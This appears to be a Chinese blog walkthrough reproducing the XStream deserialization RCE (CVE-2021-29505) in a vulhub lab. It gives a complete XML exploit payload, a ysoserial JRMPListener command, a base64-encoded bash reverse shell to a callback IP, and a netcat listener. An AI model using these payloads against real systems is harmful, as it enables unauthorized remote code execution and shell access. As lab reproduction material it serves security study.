XStream反序列化命令执行漏洞复现(CVE-2021-29505)

最新推荐文章于 2024-10-09 16:45:30 发布
最新推荐文章于 2024-10-09 16:45:30 发布
阅读量996 收藏 2
点赞数 1
分类专栏: VulnReviewing 文章标签: docker rmi java xstream 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32731075/article/details/120278017
版权

XStream反序列化命令执行漏洞复现(CVE-2021-29505)


讲道理正经来讲这个实验需要四台机器模拟,不过条件有限,我就用两台机器模拟了。
我们需要一台攻击机
一台安装了xstream服务的机器
一台安装了RMI服务的机器
一台机器接收shell
这里我的攻击机是我的物理机(192.168.0.103),其他的三台机器全部由虚拟机代替了(192.168.248.163)
首先我们需要搭建漏洞环境
直接从vulhub上面克隆我们的漏洞环境,详情自行百度
然后进入我们要复现的漏洞的路径,运行
docker-compose up -d
等待我们环境搭建完毕

在这里插入图片描述
大概就是这么个效果,然后docker ps看一下刚刚运行的容器
在这里插入图片描述
可以看淡映射的主机端口,我们在我们的攻击机上访问一下
在这里插入图片描述
大概就是这么个效果。
然后我们在我们的虚拟机上搭建一个RMI服务器,也就是远程方法接口
这里我们使用神奇ysoserial,工具自行github
我们需要运行的方法是这一句

bash -i >& /dev/tcp/ip/port 0>&1

然后再这个网站上编码一下

http://www.jackson-t.ca/runtime-exec-payloads.html

在这里插入图片描述
箭头指的部分就是我们需要的payload
然后我们在我们的RMI服务器上运行

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 2256 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0OC4xNjMvOTk5OSAwPiYx}|{base64,-d}|{bsh,-i}"

引号里面的部分就是你上一步编码的内容,2256就是监听的端口,可以自定义在这里插入图片描述
上图是监听成功的样子
然后在我们的就收shell的服务器上也就是你上一步生成payload填写的ip的那天设备上监听对应的端口

nc -lvvp 9999

然后我们通过burpsuite抓到访问xstream服务首页的数据包。
在这里插入图片描述
把请求类型改成post,content-type改为xml
然后再请求体中粘贴下面这一串

<java.util.PriorityQueue serialization='custom'> <unserializable-parents/>

<java.util.PriorityQueue>

<default>

<size>2</size>

</default>

<int>3</int>

<javax.naming.ldap.Rdn_-RdnEntry>

<type>12345</type>

<value class='com.sun.org.apache.xpath.internal.objects.XString'>

<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>

</value>

</javax.naming.ldap.Rdn_-RdnEntry>

<javax.naming.ldap.Rdn_-RdnEntry>

<type>12345</type>

<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>

<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>

<parsedMessage>true</parsedMessage>

<soapVersion>SOAP_11</soapVersion>

<bodyParts/>

<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>

<attachmentsInitialized>false</attachmentsInitialized>

<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>

<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>

<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>

<names>

<string>aa</string>

<string>aa</string>

</names>

<ctx>

<environment/>

<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>

<java.rmi.server.RemoteObject>

<string>UnicastRef</string>

<string>192.168.248.163</string>

<int>2256</int>

<long>0</long>

<int>0</int>

<long>0</long>

<short>0</short>

<boolean>false</boolean>

</java.rmi.server.RemoteObject>

</registry>

<host>192.168.248.163</host>

<port>2256</port>

</ctx>

</candidates>

</aliases>

</nullIter>

</sm>

</message>

</value>

</javax.naming.ldap.Rdn_-RdnEntry>

</java.util.PriorityQueue>

</java.util.PriorityQueue>

上面涉及到ip与端口的地方均修改为你RMI服务器的对应ip与端口
在这里插入图片描述
然后发送,看到响应了500的返回值
在这里插入图片描述
在看看我们RMI服务器打印的日志
在这里插入图片描述
基本可以确定利用成功了
再看看我们的监听
在这里插入图片描述
嗯,很不错呢!!成功复现。

Iwanturoot
关注
专栏目录
NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)
0xSec
05-24 663
NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞,未经身份认证的攻击者可利用该漏洞远程执行代码。
CVE-2021-29505 XStream远程代码执行漏洞复现
m0_56642842的博客
07-29 2011
0x00 简介 XStream是一个常用的Java对象和XML相互转换的工具,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,大大简化了XML序列化工作。 0x01 漏洞概述 XStream官方发布安全更新,修复了多个XStream 反序列化漏洞,其中就包含了CVE-2021-29505。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2021-29505反序列化代码执行漏洞等。漏洞复杂度低,
XStream 反序列化远程命令执行漏洞复现(CVE-2021-21351)
weixin_43223153的博客
03-30 5814
XStream 反序列化远程命令执行漏洞复现 1. 漏洞影响版本 XStream <= 1.4.15 2. 环境搭建 安装漏洞靶场vulhub git clone git://github.com/vulhub/vulhub.git 3. 漏洞复现 1 进入到漏洞环境文件夹,启动漏洞环境。 cd /vulhub/xstream/CVE-2021-21351 docker-compose up -d 2 启动好之后,访问靶机的ip加8080端口 3 下载JNDI注入利用工具: 下载地址:https
XStream远程代码执行-CVE-2021-29505
thelostworld
05-25 402
XStream远程代码执行CVE-2021-29505 )一、简介描述XStream是一种OXMapping技术,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。攻击者可以操纵已处理的输入流并替换或注入对象,从而执行从远程服务器加载的任意代码。二、影响版本:XStream <= 1.4.16三、环境搭建:https://raw.githubusercontent.com/vulhub/vulh
XStream漏洞升级版本
最新发布
yuchenai的博客
10-09 356
XStream版本漏洞修复
XStream 反序列化命令执行漏洞CVE-2021-21351)
EC_Carrot的博客
08-21 1185
漏洞简介 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令漏洞复现 由于目标环境Java版本高于8u191,所以我们需要使用org.apache.naming.
java xstream组件反序列化漏洞复现
Shanfenglan's blog
12-16 2559
文章目录前言1. CVE-2021-213511.1 利用2. CVE-2021-295052.1 利用 前言 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn_-RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令
XStream 反序列化命令执行漏洞CVE-2021-29505
EC_Carrot的博客
08-21 775
漏洞简介 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求,进而执行任意命令漏洞复现 我们需要自己的服务器上使用ysoserial的JRMPListener启动一个恶意的RMI Registry: java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099
CVE-2021-21351-Stream 反序列化命令执行漏洞复现
weixin_59086772的博客
12-02 683
今天雨笋教育小编给大家介绍,XStream是一个简单易用的开源java类库,在解析XML文本时使用黑名单机制来防御反序列化漏洞,但之前的版本黑名单存在缺陷所以造成反序列化命令执行错误,下午具体来看一下复现过程吧。 0x00简介 XStream是一个轻量级、简单易用的开源Java类库, 它主要用于将对象序列化成XML(JSON)或反序列化为对象。 0x01漏洞概述 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞, 但是其 1.4.15 及之前版本黑名单存在缺陷, 攻击者可
CVE-2021-21351 XStream反序列化远程代码执行漏洞
m0_56642842的博客
08-13 2759
0x00 简介 XStreamJava类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 0x01 漏洞概述 在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解组时处理的流包含类型信息以重新创建以前编写的对
XStream 反序列化命令执行漏洞复现CVE-2021-21351)
Vitaminapple的博客
04-19 764
XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令
xstream 远程代码执行CVE-2021-29505
YouthBelief的博客
11-14 1411
这里写目录标题0x01 漏洞描述0x02 影响范围0x03 漏洞复现环境搭建0x04 漏洞修复 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 环境搭建 0x04 漏洞修复
Xstream反序列化漏洞
qq_50296568的博客
08-08 782
Xstream库中部分类本身会做反射的 invoke()、序列化的 resovleClass()、readObject()等等,同时这些类的这些操作有被攻击者恶意利用的危险。例如CVE-2020-26217中我们可以通过构造一个包含恶意XML的类。XStream是一个Java库,用于将Java对象序列化为XML格式,也可以将XML格式的数据反序列化Java对象。它是一个流行的开源库,常用于在分布式系统中传输和存储数据。
漏洞复现-Xstream(CVE-2021-29505)
aming小老弟
06-01 2041
Xstream
Java 反序列化XStream 反序列化
YJ_12340的博客
06-26 486
XStream 是一个简单的基于 Java 库,Java 对象序列化到 XML,反之亦然(即:可以轻易的将 Java 对象和 XML 文档相互转换)。
Xstream漏洞复现CVE-2021-29505
Ashely的博客
09-24 3329
Vulhub漏洞环境搭建 拉取漏洞镜像 复现漏洞 一、Vulhub漏洞环境搭建 详见文章Vulhub靶场搭建(Centos7) 二、拉取漏洞镜像 1.进入到vulhub/Xstream/CVE-2021-29505目录下,执行 docker-compose up -d 等待拉取镜像。(默认拉取镜像速度很慢,建议换源,可参考https://blog.csdn.net/weixin_30565327/article/details/101108079) 2. ...
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
XStream是一个常用的Java对象和XML相互转换的工具。近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
XStream命令执行(CVE-2021-29505)
m0_65150886的博客
02-18 854
XStream在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16及之前版本黑名单存在缺陷。攻击者可以操纵已处理的输入流并替换或注入对象,从而在。XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。3.使用ysoserial并选择一个端口进行攻击(此处选择了1099)1.访问http://ip:port,出现如下页面,开始实验。2.对反弹shell进行base64编码。Host: 目标ip:port。
CVE-2021-29505XStream远程代码执行漏洞通告
爱国小白帽
05-17 1966
报告编号:B6-2021-051703 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-17 1 漏洞简述 2021年05月17日,360CERT监测发现XStream官网发布了XStream安全更新,漏洞编号为CVE-2021-29505漏洞等级:严重,漏洞评分:9.8。 XStream是一种OXMapping技术,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 对此,360
腾讯蓝军安全通告|XStream远程代码执行漏洞(CVE-2021-29505)
Tencent_SRC的博客
05-17 5772
前言上周五XStream官方发布安全更新,由于官方把需要公告的CVE-2021-29505(任意代码执行漏洞)链接贴错成了CVE-2020-26258(SSRF漏洞)链接,导致很多人没有重...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值